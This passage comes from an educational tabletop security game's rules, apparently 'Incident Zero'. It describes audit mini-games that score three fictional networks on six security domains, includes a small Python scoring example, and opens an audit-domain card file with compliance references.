- Weaknesses: Legacy accounting system (unpatched, and unmonitored — the Detection FAIL)
- Attack Scenario: Attacker may get into DMZ but segmentation blocks lateral movement; an attack routed through the legacy segment, however, could go undetected
- Cost of Breach: Moderate (segmentation limits damage; the legacy blind spot is the residual risk)


Enterprise Bank - Audit Results

Domain                 Score   Finding
Network Segmentation   PASS    Microsegmentation between all critical systems
Access Control         PASS    Hardened DCs, MFA, minimal over-privilege
Detection              PASS    IDS/IPS + dual SIEM + honeypot
Backup & Recovery      PASS    Multiple offline vaults, quarterly testing
Third-Party Risk       PASS    Cloud only for non-critical, extensive monitoring
Operations             PASS    Dual SIEM, air-gapped logging

Score: 6/6 PASS

Risk Rating: LOW
- Strengths: Defense-in-depth across all domains
- Weaknesses: Very expensive to operate; regulatory complexity
- Attack Scenario: Multiple layers would have to be bypassed; honeypot would alert SOC immediately
- Cost of Breach: Lower (but incident response costs are high due to complexity)


Scoring & Comparison

Audit Score Tiers

Score          Assessment            Implication
6/6 PASS       Enterprise-grade      Highest security, highest cost
5/6 PASS       Strong security       Balanced security & cost
3-4/6 PASS     Adequate but gapped   Risk exposure present
Below 3/6      High risk             Vulnerabilities likely exploited
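To make the answer key checkable rather than a matter of memory, here is an added worked example (not part of the Incident Zero rulebook or its repository) that encodes the six printed PASS/FAIL criteria as a table of FAIL conditions over a small structured description of each sample network, then reproduces the strict answer key: Startup Tech 0/6, Mid-Market Corp 5/6, Enterprise Bank 6/6, together with the tier table and the v2.2 star/PARTIAL mapping. The field names (segmentation_enforced, mfa_remote_access, and so on) are this example's own encoding of the descriptions, not game identifiers, and two values are assumptions: Startup Tech's backups are treated as single-location because the description never says otherwise (an auditor scores what is evidenced), and an internet-facing sensitive-data cloud system that does have a WAF is treated as PASS, because the printed Domain 5 criteria do not cover that case.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Network:
    # Facts an auditor extracts from a network description; field names are this
    # example's own encoding, not game identifiers.
    name: str
    segmentation_enforced: bool        # firewall between zones OR microsegmentation
    dedicated_dc: bool
    dc_overloaded: bool
    mfa_remote_access: bool            # answer key: cloud consoles count as remote access
    broad_admin_access: bool
    ids_or_ips: bool
    siem: bool
    critical_segments_unmonitored: int
    backup_deployed: bool
    backup_tested: bool
    backup_geo_diverse: bool
    cloud_isolated: bool               # private network, not reachable from the internet
    cloud_handles_sensitive_data: bool
    waf: bool
    centralized_logging: bool


def criteria(n: Network):
    """The six printed domains as (domain, PASS text, [FAIL conditions]); PASS when none holds."""
    return [
        ("1. Network Segmentation", "firewall or microsegmentation enforced between zones",
         [("flat network or segmentation without enforcement", not n.segmentation_enforced)]),
        ("2. Access Control & Identity", "dedicated DC, MFA on remote access, minimal over-privilege",
         [("no dedicated DC", not n.dedicated_dc), ("DC overloaded", n.dc_overloaded),
          ("no MFA for remote access", not n.mfa_remote_access),
          ("broad admin access", n.broad_admin_access)]),
        ("3. Incident Detection & Response", "IDS/IPS or SIEM covers all critical segments",
         [("no IDS/IPS and no SIEM", not (n.ids_or_ips or n.siem)),
          (f"{n.critical_segments_unmonitored} critical segment(s) outside detection coverage",
           n.critical_segments_unmonitored > 0)]),
        ("4. Backup & Disaster Recovery", "backup deployed, tested, geographically diverse",
         [("no backup", not n.backup_deployed), ("backup untested", not n.backup_tested),
          ("single backup location", not n.backup_geo_diverse)]),
        # Domain 5 as printed FAILs only when internet-facing AND sensitive AND no WAF.
        # ASSUMPTION: internet-facing sensitive data behind a WAF is not covered by the
        # printed criteria and is treated here as PASS (a Variation C judgment call).
        ("5. Third-Party Risk Management", "cloud systems isolated, non-sensitive, or behind a WAF",
         [("internet-facing cloud systems hold sensitive data with no WAF",
           not n.cloud_isolated and n.cloud_handles_sensitive_data and not n.waf)]),
        ("6. Security Operations & Monitoring", "SIEM deployed and centralized logging active",
         [("no SIEM", not n.siem), ("no centralized logging", not n.centralized_logging)]),
    ]


def audit(n: Network) -> dict:
    """Returns {domain: (PASS/FAIL, finding)}; a FAIL finding lists every condition met."""
    report = {}
    for domain, pass_text, checks in criteria(n):
        failures = [label for label, hit in checks if hit]
        report[domain] = ("FAIL", "; ".join(failures)) if failures else ("PASS", pass_text)
    return report


def score(results: dict) -> int:
    """Primary score: number of PASS domains (X/6)."""
    return sum(1 for res, _ in results.values() if res == "PASS")


def tier(passes: int) -> str:
    """Audit Score Tiers: 6/6, 5/6, 3-4/6, below 3/6."""
    if passes == 6:
        return "Enterprise-grade"
    if passes == 5:
        return "Strong security"
    return "Adequate but gapped" if passes >= 3 else "High risk"


def star_to_pass_fail(rating) -> str:
    """v2.2 flavor mapping: 1-2 stars = FAIL, 3+ stars = PASS, 'PARTIAL' = FAIL."""
    if rating == "PARTIAL":
        return "FAIL"
    return "PASS" if int(rating) >= 3 else "FAIL"


# The three sample networks, transcribed from the descriptions in this guide.
STARTUP = Network("Startup Tech", segmentation_enforced=False, dedicated_dc=True,
                  dc_overloaded=False, mfa_remote_access=False, broad_admin_access=False,
                  ids_or_ips=False, siem=False, critical_segments_unmonitored=0,
                  backup_deployed=True, backup_tested=False,
                  backup_geo_diverse=False,  # ASSUMPTION: not stated, so not evidenced
                  cloud_isolated=False, cloud_handles_sensitive_data=True, waf=False,
                  centralized_logging=False)
MID_MARKET = Network("Mid-Market Corp", segmentation_enforced=True, dedicated_dc=True,
                     dc_overloaded=False, mfa_remote_access=True, broad_admin_access=False,
                     ids_or_ips=True, siem=True,
                     critical_segments_unmonitored=1,  # the isolated legacy segment
                     backup_deployed=True, backup_tested=True, backup_geo_diverse=True,
                     cloud_isolated=True, cloud_handles_sensitive_data=True, waf=True,
                     centralized_logging=True)
ENTERPRISE = Network("Enterprise Bank", segmentation_enforced=True, dedicated_dc=True,
                     dc_overloaded=False, mfa_remote_access=True, broad_admin_access=False,
                     ids_or_ips=True, siem=True, critical_segments_unmonitored=0,
                     backup_deployed=True, backup_tested=True, backup_geo_diverse=True,
                     cloud_isolated=True, cloud_handles_sensitive_data=False, waf=True,
                     centralized_logging=True)

if __name__ == "__main__":
    for net in (STARTUP, MID_MARKET, ENTERPRISE):
        results = audit(net)
        print(f"{net.name}: {score(results)}/6 PASS, tier: {tier(score(results))}")
        for domain, (res, finding) in results.items():
            print(f"  {domain:36} {res}  {finding}")
```

Running the block prints each network's X/6 score, tier and per-domain findings. The strict 0/6 reading of Startup Tech falls out of the printed criteria with no special casing; flipping its mfa_remote_access to True reproduces the lenient 1/6 reading from the answer key, and both land in the same "High risk" tier, which is why the judgment call makes a good Variation C debate.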

Team Competition

Which team's audit assessment was most accurate?
- Teams that scored Startup as high-risk: +1 point
- Teams that scored Enterprise as low-risk: +1 point
- Teams that identified Legacy System as Mid-Market's weakness: +1 point

Winner: Team with most accurate audit assessments


Debrief (5 minutes)

Discussion Questions

  1. "Why would Startup Tech be attractive to attackers?"
     Answer: No detection, no segmentation, cloud exposed

  2. "If you had to recommend improvements to Startup, what's priority #1?"
     Answer: Network segmentation OR IDS/SIEM (detection)

  3. "Why is Enterprise Bank so expensive?"
     Answer: Redundancy, microsegmentation, multiple layers of defense

  4. "Which organization would you actually want to work for?"
     Answer: Mid-Market (good balance of security and usability)

VARIATION B: RANDOM NETWORK GENERATION

"Build-Then-Audit Mini-Game"

Duration: 25-35 minutes
Players: 1-4 teams
Difficulty: Medium (requires both building and auditing)
Best For: Combined learning, deeper understanding


Concept

"Each team builds a simplified network by drawing random infrastructure cards. Then you audit each other's networks. Better auditors find more gaps."

This combines elements of Network Building (simplified) with Audit mechanics. Teams make trade-off decisions, then their network design is audited by competitors.


Game Flow

Phase 1: Rapid Network Generation (10 minutes)

Each team builds a network using a simplified card deck:

Simplified Network Generation Cards

SERVER CARDS (Draw 5 cards, must include certain types):
- Email Server (must have)
- Web Server (must have)
- Database Server (must have)
- Domain Controller (should have)
- Backup System (optional)
- Development Server (optional)
- File Server (optional)
- Cloud Workload (optional)

SECURITY DEVICE CARDS (Draw 3 cards, choose to deploy or skip):
- Firewall
- IDS
- SIEM
- Email Gateway
- WAF
- Honeypot

ARCHITECTURE CARD (Draw 1, determines layout):
- Flat Network (budget-friendly, weak)
- Segmented Network (balanced)
- Fully Isolated (expensive, strong)

Rules:
- Must have: Email, Web, Database
- Can choose: Others
- Budget: Implicit (each card represents a choice; no money tracking)
- Time: 10 minutes to decide and document on "Network Card"

Each team creates a Network Card:

TEAM A'S NETWORK:

SERVERS:
✓ Email Server
✓ Web Server
✓ Database Server
✓ Domain Controller
✓ Backup System
✓ File Server
✗ Development Server (skipped)

SECURITY DEVICES:
✓ Firewall
✓ IDS
✗ SIEM (skipped)
✓ Email Gateway
✗ WAF (skipped)
✗ Honeypot (skipped)

ARCHITECTURE:
→ Segmented (3 zones)

Phase 2: Cross-Team Audit (15 minutes)

Each team audits a different team's network (round-robin):

  1. Auditing Team Receives Network Card
  2. Auditing Team Scores Network on 6 Domains
  3. PASS or FAIL for each domain
  4. Write findings
  5. Present Audit Results to Building Team

Example Audit of Team A:

AUDIT OF TEAM A'S NETWORK:

Domain 1: Network Segmentation
  Decision: Segmented (3 zones) → PASS
  Finding: Good segmentation between DMZ, Internal, Sensitive

Domain 2: Access Control
  Decision: Domain Controller present → PASS
  Finding: Identity management in place

Domain 3: Detection
  Decision: IDS present but NO SIEM → PARTIAL FAIL
  (v2.2: "PARTIAL" counts as FAIL for the score)
  Finding: Can detect network attacks but no centralized logging for correlation

Domain 4: Backup & Recovery
  Decision: Backup System present → PASS
  Finding: Can recover from data loss

Domain 5: Third-Party Risk
  Decision: No WAF on Web Server → FAIL
  Finding: Web server vulnerable to application attacks

Domain 6: Operations
  Decision: No SIEM → FAIL
  Finding: No centralized monitoring; incident response slower

AUDIT SCORE: 3/6 PASS

CRITICAL FINDINGS:
1. Missing SIEM (no centralized logging)
2. No WAF (web server unprotected)
3. IDS without SIEM (detection blindspot)

Phase 3: Auditor Scoring (5 minutes)

Accuracy of Audits is Scored:

Audit Accuracy               Points
Identified all major gaps    +5
Identified some gaps         +3
Missed critical gap          -2
Incorrect assessment         0

Team Scores:
- Building Teams: Score = (6 - number of fails) × 5
  - Example: 3/6 PASS = 3 fails → 3 × 5 = 15 points
- Auditing Teams: Score = accuracy of audit assessment

Winner: Highest combined score OR winner of each category


Debrief (5 minutes)

  1. "What gaps did auditors find in your network?"
  2. "Did the auditors miss anything you're concerned about?"
  3. "What would you fix if you had to improve?"

VARIATION C: "AUDIT THE AUDITOR" DEBATE

Interactive Challenge & Discussion Game

Duration: 20-30 minutes
Players: 2-4 teams
Difficulty: High (requires critical thinking & argumentation)
Best For: Advanced teams, strong discussion-based learning


Concept

"You're given a network design and audit findings. As a team, debate whether the auditor's findings are FAIR, HARSH, or MISSING SOMETHING. Win by making the most convincing argument."

This is a debate game where teams argue the merits of audit findings, teaching that audits are interpretable and that defending infrastructure requires understanding the rationale.


Game Materials

Audit Finding Scenarios (3 total)

SCENARIO 1: "The Startup Defense"

(Same fictional company as Variation A's "Startup Tech": 50 people, cloud-first, no VPN.)

SCENARIO:
Startup Tech built this network:
- Email (Cloud), Web (Cloud), Database (Cloud),
  Domain Controller (On-Prem), Backup (Cloud snapshots)
- No Firewall between cloud and on-prem
- No IDS or SIEM
- No VPN (all cloud-native; cloud consoles protected by
  provider logins only, no MFA)

AUDITOR'S FINDINGS:
Domain 1: Network Segmentation → FAIL
  "No firewall between cloud and on-prem represents 
   uncontrolled lateral movement risk."

Domain 3: Detection → FAIL
  "No IDS/SIEM means attacks go undetected."

OVERALL: HIGH RISK

STARTUP'S COUNTERARGUMENT:
"We use cloud providers (AWS/Azure) which have built-in
firewalls at the cloud level. Cloud provider security
groups mean only the services we expose are reachable.
Our small team (50 people) means we're faster to respond.
This audit is too harsh for a startup."

YOUR JOB:
- Is the auditor FAIR? (reasonable standards)
- Is the auditor HARSH? (too strict for context)
- Is the auditor MISSING gaps? (what should they have found?
  Hint: no MFA, untested backups)
- Vote: Fair / Harsh / Missing / Balanced

SCENARIO 2: "The Legacy System Dilemma"

SCENARIO:
Mid-Market Corp has this system:
- 15-year-old Accounting System (on-prem)
- Runs on Windows Server 2003 (unsupported, unpatched)
- Handles $2B in transactions annually
- Cannot be replaced for 2+ years (licensing/training)
- Isolated on separate network segment but bridged for 
  month-end consolidation

AUDITOR'S FINDINGS:
Domain 2: Access Control → FAIL
  "Legacy system runs on unsupported OS. Vulnerability 
   present = critical risk."

Domain 4: Backup & Recovery → PARTIAL
  "System backed up but no tested recovery procedure."

OVERALL: CRITICAL RISK (specifically legacy system)

CORP'S COUNTERARGUMENT:
"The system is air-gapped except for 3 days per month.
We have detective controls (IDS) watching for suspicious 
access. The cost of replacement ($2M) is greater than 
our risk tolerance. This system is a known risk we're 
accepting."

YOUR JOB:
- Is the auditor RIGHT to flag this?
- Is the corporation taking reasonable risk?
- How would you rate this scenario? Risk Acceptance vs. Negligence?
- Vote: Auditor Correct / Corp Reasonable / Need More Controls / Acceptable Risk

SCENARIO 3: "The Over-Engineering Question"

SCENARIO:
Enterprise Bank built this network:
- 10+ security zones with microsegmentation
- Dual SIEM systems (Splunk + QRadar)
- IDS + IPS on every zone
- Honeypot network with decoys
- All systems hardened per NIST
- Quarterly disaster recovery testing
- Air-gapped offline backups in vault
- Annual compliance audit (PCI-DSS, SOX)

COST: $5M annual IT security budget

AUDITOR'S FINDINGS:
Domain 1-6: ALL PASS ✓

AUDITOR'S COMMENT:
"Exceptional security posture. Well-engineered 
defense-in-depth. Highly resilient. Recommended 
best practices for financial institution."

STAKEHOLDER QUESTION:
"Is this over-engineered? Could we achieve 80% 
of the security with 30% of the cost?"

YOUR JOB:
- Is defense-in-depth always justified?
- What's the cost-benefit breakpoint?
- For different organization types (startup vs. bank), 
  what's appropriate?
- Vote: Over-Engineered / Justified / Right for Context / Too Expensive

Gameplay (25-30 minutes)

Turn Structure

Phase 1: Present Scenario (3 minutes)

TO reads:
  1. Organization and network design
  2. Auditor's findings
  3. Organization's counterargument
  4. Debate question

Phase 2: Debate Preparation (5 minutes)

Each team gets assigned a position:
- Team A: Defend the Auditor (findings are fair/necessary)
- Team B: Defend the Organization (counterargument is valid)
- Team C: Play Neutral Assessor (judge fairness of both)

Teams prepare arguments:
- 2-3 key points supporting their position
- Anticipate opponent's counterarguments
- Use security/business logic

Phase 3: Debate Round (5 minutes)

Structure:
  1. Auditor Position: 1 minute opening (Team A)
  2. Organization Position: 1 minute opening (Team B)
  3. Cross-Examination: 2 minutes (back-and-forth)
  4. Neutral Assessment: Team C (judge who had better argument)

Phase 4: Judge's Decision & Scoring (2 minutes)

Team C Scores:
- Most convincing argument: +3 points
- Better use of logic: +2 points
- Anticipated counterarguments: +2 points
- Clearer presentation: +1 point

Repeat for each scenario (3 scenarios = 3 rounds)


Example Debate

SCENARIO 1: Startup Defense

AUDITOR POSITION (Team A): "The findings are fair because:
  1. Network security standards apply to all organizations
  2. Cloud provider firewalls don't replace organizational controls
  3. No IDS means breaches go undetected for weeks
  4. A $10M breach destroys a startup; prevention is essential"

ORGANIZATION POSITION (Team B): "The counterargument is valid because:
  1. Startups operate under different constraints than enterprises
  2. Cloud provider security groups limit what's exposed
  3. Our cloud provider has better security than we could build
  4. For 50 employees, a $50K security investment is proportional
  5. We're risk-accepting; this is a known trade-off"

CROSS-EXAMINATION (back and forth):

A: "But if you get compromised, your customer data is exposed. Isn't that a problem?"

B: "Yes, but our cloud provider's controls AND limited data make that less likely than you're suggesting."

A: "What about detection? If you're breached, you won't know for months."

B: "True, but adding SIEM costs $5K/month that we don't have. We're choosing early detection (IDS) instead of centralized logging."

C (NEUTRAL): "Who made the better argument?"
- Team A cited industry standards
- Team B cited resource constraints
- Both had merit

VERDICT: Team B made the slightly more convincing argument (better contextualization of risk)
- Team B: +3 points
- Team A: +2 points


Debate Scoring & Winner

After 3 scenarios:

Team                    Scenario 1   Scenario 2   Scenario 3   TOTAL
Team A (Auditor)        2            3            2            7
Team B (Organization)   3            2            2            7
Team C (Neutral)        3            2            3            8

Winner: Team C (Neutral Assessor)

Award: "Best Critical Thinking"


Debrief (5 minutes)

Key Learning Questions

  1. "Are all audit findings equally valid?"
     Answer: No; context matters (startup vs. bank)

  2. "How would you defend an audit finding to the board?"
     Teaching point: Audits need business justification, not just technical standards

  3. "What's the difference between a 'critical finding' and a 'risk we're accepting'?"
     Teaching point: Risk management is nuanced; not all gaps are equally important

  4. "How does this change how you think about the attacks in Incident Response?"
     Connection: "Auditors find gaps that attackers exploit"

USING ALL THREE VARIATIONS

Which Variation When?

Variation A: Pre-Built Networks (Quickest)

Use When:
- Limited time (< 30 min session)
- First exposure to audit concepts
- Want to compare different infrastructure strategies
- Non-competitive, educational focus

Learning Value:
- Understand how audit domains work
- See difference between good/bad designs
- Low setup time

Variation B: Random Generation (Balanced)

Use When:
- Want to combine building + auditing
- 30-40 minute session
- Teams benefit from designing then being audited
- Competitive element desired

Learning Value:
- Teams make trade-off decisions
- See consequences of choices reflected in audit
- "This gap I chose to accept was exactly what the auditor found!"

Variation C: Debate Game (Most Interactive)

Use When:
- Advanced/experienced teams
- Want deep critical thinking
- Discussion-based learning preferred
- Comfortable with argumentation/debate format

Learning Value:
- Audit findings are interpretable
- Context matters (startup vs. bank)
- Security decisions involve trade-offs
- Preparation for defending security to board/leadership


SAMPLE PLAY SESSIONS


Session 1: Pre-Built Networks Only (20 minutes)

Setup: 3 min
Audit Startup Tech: 4 min
Audit Mid-Market: 4 min
Audit Enterprise: 4 min
Comparison & Discussion: 3 min
Debrief: 2 min

Total: 20 minutes

Perfect for: Intro to audit concepts


Session 2: Random Generation + Audit (35 minutes)

Setup: 3 min
Teams build networks (simplified): 10 min
Teams audit each other: 15 min
Score & announce winner: 3 min
Debrief: 4 min

Total: 35 minutes

Perfect for: Combined learning, competitive


Session 3: Debate Game Intensive (30 minutes)

Setup & brief: 2 min

SCENARIO 1:
- Presentation: 1 min
- Prep: 3 min
- Debate: 5 min
- Scoring: 1 min
- Subtotal: 10 min

SCENARIO 2: 10 min
SCENARIO 3: 10 min

Debrief: 3 min

Total: 30 minutes

Perfect for: Advanced critical thinking


Session 4: Combination Play (60 minutes)

Variation A (Pre-Built): 20 min
- Understand audit domains via 3 sample networks

Variation B (Random Gen): 25 min
- Build network, get audited
- See your choices reflected in audit findings

Variation C (Debate): 10 min
- Single debate scenario to reinforce learning

Debrief & Connection: 5 min
- "Now you understand how audits work"
- "In Incident Response, attackers will exploit these gaps"

Total: 60 minutes

Perfect for: Comprehensive audit education


CONNECTING TO INCIDENT RESPONSE (Attack Chain)

After playing Audit Standalone, teams can transition to the Incident Response module:

Narrative Bridge:

"You just audited how well different organizations designed their security. Now let's see what happens when an attacker encounters those same networks. The gaps you found in the audit? Attackers will find them too.

Your audit findings were:
- Startup Tech: HIGH RISK (no segmentation, no detection)
- Mid-Market: MEDIUM RISK (strong foundation, legacy gap)
- Enterprise: LOW RISK (defense-in-depth)

Now, if an attacker targets each of these networks, how will it go?"


MATERIALS CHECKLIST

Everything needed to play today is in this document: the three network descriptions, the 6-domain framework, the answer keys, the inline audit worksheet, and the three debate scenarios. Printed play aids (scoring reference card, audit worksheet, judge guide, scoring sheets): see print pack (coming).

Variation A: Pre-Built Networks

Variation B: Random Generation

Variation C: Audit the Auditor


QUICK REFERENCE

Variation        Duration    Complexity   Competition   Setup
A: Pre-Built     15-25 min   Low          Low           Minimal
B: Random Gen    25-35 min   Medium       Medium        Moderate
C: Debate        20-30 min   High         High          Moderate

DEBRIEF CONNECTIONS TO INCIDENT ZERO

After any Audit Standalone variation, teams should understand:

  1. Audits find real vulnerabilities - Same gaps auditors find, attackers will exploit
  2. Context matters - Startup vs. bank = different risk tolerance
  3. Trade-offs are real - Can't afford everything; must prioritize
  4. Detection vs. Prevention - Strong IDS/SIEM matters as much as hardening
  5. Incident response starts with audit - Knowing your gaps speeds detection

Key Teaching: "In Incident Response, auditors played the role of the security team. Attackers play the same role, but with opposite intent. They're looking for exactly what auditors find."


Incident Zero: Compliance Audit Standalone Mini-Games
Three variations of security assessment gameplay
Teach how audits find vulnerabilities that attackers will exploit

cards/audit-compliance/core-deck/audit-domain-cards.md

Audit & Compliance Module: Audit Domain Assessment Cards

Version: 2.2 - Playtest Edition
Last Updated: October 2025


Overview

Audit Domain Assessment Cards represent six critical security domains that an organization must have controls for. Each domain is assessed independently, with findings recorded on a standard audit report.


Assessment Methodology

The Audit Process

  1. Assessment: Auditor reviews domain for evidence of controls
  2. Scoring: Rate domain 1-5 stars based on maturity
     - ⭐ (1 star): No controls, critical findings
     - ⭐⭐ (2 stars): Minimal controls, major findings
     - ⭐⭐⭐ (3 stars): Adequate controls, minor findings
     - ⭐⭐⭐⭐ (4 stars): Strong controls, few findings
     - ⭐⭐⭐⭐⭐ (5 stars): Excellent controls, no findings
  3. Findings: Record specific gaps (vulnerabilities, non-compliance)
  4. Remediation: Recommend actions to address findings
  5. Report: Compile audit findings and recommendations

Star → PASS/FAIL Mapping (v2.2)

PASS/FAIL per domain (X/6) is the primary score. Stars are flavor, with this fixed mapping:

1-2★ = FAIL · 3★+ = PASS · "PARTIAL" counts as FAIL

Scoring Impact

Domain Score determines:
- Audit Grade (1-5 stars, flavor)
- PASS/FAIL status (primary — via the mapping above)
- Findings Severity (critical/major/minor)
- Modifiers for other modules (IR, DR get harder if audit failed — see the canonical table in docs/rules/module-audit-compliance.md)


Audit Domain Cards

DOMAIN-01: Network Segmentation & Isolation

Focus: How well is the network divided into protected segments?
Critical For: Preventing lateral movement
Regulatory References: PCI-DSS (network segmentation), NIST (zero trust)

What's Assessed:
- Is the network flat (1 segment) or segmented (multiple segments)?
- Are sensitive systems isolated (DMZ, database segment, admin segment)?
- Are firewall rules enforced between segments?
- Is the network architecture documented?
- Are VLANs/subnets properly configured?

Typical Findings:
- Critical (1-2 star): Flat network, no segmentation, everything can talk to everything
- Major (2-3 star): Basic segmentation exists, but enforcement is weak
- Minor (3-4 star): Segmentation exists, few rule violations
- Compliant (4-5 star): Strong segmentation, zero-trust architecture

Real-World Question: "If one system is compromised, how far can the attacker spread?"
- Flat network: Entire organization immediately
- 3-zone network: Blocked by firewalls
- Zero-trust: Individual systems isolated

Audit Evidence:
- Network diagram (shows segments)
- Firewall rule documentation
- Network ACL lists
- Proof of implementation (switch configs)
- Test results (can systems cross segments? No)

Compliance Standards:
- PCI-DSS Requirement 1: Network segmentation for cardholder data
- NIST CSF: PR.AC-5 (Network integrity protected via segmentation)
- CIS Control 12: Network Infrastructure Management (v8)

Findings Template:

FINDING: Network segmentation inadequate
SEVERITY: [Critical/Major/Minor]
DESCRIPTION: The network is [flat/minimally segmented], allowing [lateral movement/unauthorized access]
RECOMMENDATION: Implement [VLAN/firewall rules/zero-trust] to segment [database/admin/sensitive systems]
EFFORT: [1-5] weeks
COST: [Moderate/High/Very High]

Remediation Actions:
- ✓ Implement network segmentation (ARCH-02, ARCH-03 in Network Building)
- ✓ Deploy firewall with segmentation rules (SEC-08)
- ✓ Implement zero-trust architecture (ARCH-03)
- ✓ Test segmentation enforcement

Impact if Failed (1-2 stars):
- T-04 (Lateral Movement) becomes trivial for attackers
- Incident Response: -1 to NETWORK defenses (canonical modifier)
- Disaster Recovery: -10 DR budget penalty (attacker spreads widely)


DOMAIN-02: Access Control & Identity Management

Focus: How are user identities managed and access controlled?
Critical For: Preventing unauthorized access
Regulatory References: HIPAA (access controls), GDPR (access management)

What's Assessed: - Is there centralized identity management (Domain Controller/Azure AD)? - Is multi-factor authentication (MFA) enabled for sensitive access? - Are access permissions based on least privilege? - Are access reviews performed (verify who has access)? - Are privileged accounts managed (admin accounts, service accounts)?

Typical Findings: - Critical (1-2 star): No centralized identity, weak passwords, no MFA - Major (2-3 star): Some identity management, MFA not universal - Minor (3-4 star): Good identity management, minor gaps - Compliant (4-5 star): Strong identity, MFA everywhere, privilege management

Real-World Question: "How easily can an attacker use stolen credentials?" - Weak: No MFA, can use stolen password immediately - Medium: MFA only for some systems - Strong: MFA everywhere, weak credentials are useless

Audit Evidence: - AD/directory configuration - MFA enrollment status - Access policy documentation - Privileged account audit (who has admin?) - Account review records (periodic access verification)

Compliance Standards: - PCI-DSS Requirement 8: User identification and authentication - HIPAA Rule 164.308(a)(4): Unique user identification - NIST CSF: PR.AC-1 (Physical & logical access controls)

Findings Template:

FINDING: Multi-factor authentication not universally enforced
SEVERITY: [Critical/Major/Minor]
DESCRIPTION: MFA is [not implemented/optional] for [VPN/email/admin access]
RECOMMENDATION: Deploy [MFA solution] to [affected systems]
EFFORT: [2-4] weeks
COST: [Low/Moderate/High]

Remediation Actions: - ✓ Deploy MFA (D-07 in Hardening) - ✓ Implement password vault (D-12) - ✓ Credential Guard for privileged access (D-16) - ✓ Access reviews quarterly

Impact if Failed (1-2 stars): - T-03 (Compromised Credentials), T-06 (Mimikatz) become likely - Incident Response: -1 to CREDENTIAL_ABUSE defenses (canonical modifier) - Disaster Recovery: -15 DR budget penalty (attacker can restore themselves with stolen creds)


DOMAIN-03: Threat Detection & Incident Response

Focus: Can the organization detect and respond to attacks?
Critical For: Finding breaches quickly
Regulatory References: GDPR (breach detection), HIPAA (log monitoring)

What's Assessed: - Are logs collected centrally (SIEM or similar)? - Is there 24/7 monitoring of critical systems? - Are alerts configured to detect suspicious activity? - Is there a documented incident response plan? - Are incident responders trained?

Typical Findings: - Critical (1-2 star): No logging, no monitoring, no incident response plan - Major (2-3 star): Some logging, limited monitoring - Minor (3-4 star): Good logging, some gaps in alerting - Compliant (4-5 star): Comprehensive logging, active monitoring, trained team

Real-World Question: "How quickly will you detect an active attacker?" - Poor: Days/weeks (after data is already stolen) - Medium: Hours (after attacker has spread) - Strong: Minutes (catch attacker early)

Audit Evidence: - SIEM/logging configuration - Alert rules documentation - Incident response plan - Training records (who's trained?) - Incident history (how did you detect past incidents?)

Compliance Standards: - GDPR Article 33: Breach notification timing (72 hours) - HIPAA Rule 164.308(a)(6): Incident response procedures - NIST CSF: DE.AE-3 (Event detection processes)

Findings Template:

FINDING: Insufficient threat detection and monitoring
SEVERITY: [Critical/Major/Minor]
DESCRIPTION: [SIEM/monitoring] is [not deployed/inadequately configured]
RECOMMENDATION: Deploy [SIEM] with [alert rules] to detect [attack patterns]
EFFORT: [4-8] weeks
COST: [Moderate/High]

Remediation Actions: - ✓ Deploy SIEM (D-09, D-22) - ✓ Configure log centralization (D-05) - ✓ Create SIEM correlation rules (D-10) - ✓ Threat hunting program (D-13)

Impact if Failed (1-2 stars): - Breach detection is late (attacker has time to steal data) - Incident Response: -1 to Investigation rolls (canonical modifier; late detection) - Disaster Recovery: -10 DR budget penalty (dwell time longer; more data stolen)

Optional (v2.2): a 5-star rating in this domain grants +1 to Incident Response investigation rolls if IR is played later.


DOMAIN-04: Backup & Disaster Recovery

Focus: Can the organization recover from attacks/disasters?
Critical For: Ransomware resilience
Regulatory References: Most breach laws mention recovery

What's Assessed: - Is there a documented backup strategy (frequency, retention)? - Are backups tested regularly (restore actually works)? - Is backup storage off-site (geographically separated)? - Are backups immutable (cannot be deleted/encrypted)? - Is recovery time objective (RTO) documented for each system?

Typical Findings: - Critical (1-2 star): No backups or untested backups (may not restore) - Major (2-3 star): Backups exist but not properly tested - Minor (3-4 star): Backups exist and tested, gaps in immutability - Compliant (4-5 star): 3-2-1 strategy, tested, immutable, offsite

Real-World Question: "Can you recover from ransomware?" - Poor: No (backups are encrypted too) - Medium: Yes but slowly (days to recover) - Strong: Yes quickly (hours to recover, immutable backups)

Audit Evidence: - Backup schedule/documentation - Backup test results (prove restore works) - Off-site backup location documentation - Immutable backup configuration - Recovery time estimates

Compliance Standards: - Most breach laws assume backups exist (no recovery = massive damage) - HIPAA Rule 164.308(a)(7): Data backup procedures - NIST CSF: PR.IP-4 (Resilience practices documented)

Findings Template:

FINDING: Backup and recovery procedures inadequate
SEVERITY: [Critical/Major/Minor]
DESCRIPTION: Backups are [not tested/not off-site/not immutable]
RECOMMENDATION: Implement [3-2-1 strategy] with [immutable storage]
EFFORT: [2-4] weeks
COST: [Moderate]

Remediation Actions: - ✓ Implement 3-2-1 backup strategy (D-19) - ✓ Test backups quarterly (prove restore works) - ✓ Immutable storage (WORM, cloud versioning) - ✓ Off-site backup location

Impact if Failed (1-2 stars): - Ransomware attacks cannot be recovered from - Disaster Recovery: -25 DR budget penalty (no recovery option; expensive rebuild) - Business interruption is long (days vs hours) - No IR effect (matters in Disaster Recovery)


DOMAIN-05: Third-Party Risk & Cloud Security

Focus: How well are vendors and cloud services managed?
Critical For: Managing supply chain risk
Regulatory References: GDPR (processor accountability), PCI-DSS (vendor security)

What's Assessed: - Is there a vendor management program? - Are vendors required to meet security standards? - Are vendor assessments conducted (security questionnaires, audits)? - Are cloud configurations secured (IAM, encryption, monitoring)? - Is data residency managed (where is customer data stored)?

Typical Findings: - Critical (1-2 star): No vendor management, cloud misconfigured - Major (2-3 star): Basic vendor management, cloud gaps - Minor (3-4 star): Vendor management exists, minor gaps - Compliant (4-5 star): Strong vendor program, cloud security

Real-World Question: "Is your vendor secure?" - Poor: No idea (never asked them) - Medium: They said they're secure (took their word) - Strong: Assessed and monitored (ongoing verification)

Audit Evidence: - Vendor management policy - Vendor security questionnaires - Cloud configuration documentation - IAM policies for cloud access - Data residency mapping

Compliance Standards: - GDPR Article 28: Processor agreements (vendor security required) - PCI-DSS Requirement 12.8: Service provider agreements - NIST CSF: ID.SC (Supply Chain Risk Management)

Findings Template:

FINDING: Vendor and cloud security assessment inadequate
SEVERITY: [Critical/Major/Minor]
DESCRIPTION: [Vendor/Cloud] security is [not assessed/misconfigured]
RECOMMENDATION: Implement [vendor assessment process/cloud security hardening]
EFFORT: [3-6] weeks
COST: [Low/Moderate]

